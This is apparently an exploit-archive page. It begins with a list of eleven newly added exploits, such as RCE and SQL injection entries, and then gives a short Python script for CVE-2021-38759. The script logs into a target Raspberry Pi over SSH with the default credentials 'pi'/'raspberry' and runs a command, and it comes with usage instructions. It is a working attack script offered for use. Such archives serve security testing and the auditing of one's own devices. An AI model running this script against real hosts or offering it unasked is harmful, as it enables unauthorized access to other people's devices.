
11 changes to exploits/shellcodes MTPutty 1.0.1.21 - SSH Password Disclosure Raspberry Pi 5.10 - Default Credentials Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated) Chikitsa Patient Management System 2.0.2 - 'backup' Remote Code Execution (RCE) (Authenticated) LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated) TestLink 1.19 - Arbitrary File Download (Unauthenticated) Student Management System 1.0 - SQLi Authentication Bypass Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution (RCE) (Authenticated) Grafana 8.3.0 - Directory Traversal and Arbitrary File Read Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)
34 lines
No EOL
672 B
Python
Executable file
34 lines
No EOL
672 B
Python
Executable file
# Exploit Title: Raspberry Pi 5.10 - Default Credentials
|
|
# Date: 08/12/2021
|
|
# Exploit Author: netspooky
|
|
# Vendor Homepage: https://www.raspberrypi.com/
|
|
# Software Link: https://www.raspberrypi.com/software/operating-systems/
|
|
# Version: Raspberry Pi OS <= 5.10
|
|
# Tested on: Raspberry Pi OS 5.10
|
|
# CVE : CVE-2021-38759
|
|
|
|
# Initial Release: https://twitter.com/netspooky/status/1468603668266209280
|
|
|
|
# Run: $ python3 exploit.py IP
|
|
|
|
import paramiko
|
|
|
|
import sys
|
|
|
|
h=sys.argv[1]
|
|
|
|
u="pi"
|
|
|
|
p="raspberry"
|
|
|
|
c=paramiko.client.SSHClient()
|
|
|
|
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
|
|
|
c.connect(h,username=u,password=p)
|
|
|
|
i,o,e=c.exec_command("id")
|
|
|
|
print(o.read())
|
|
|
|
c.close() |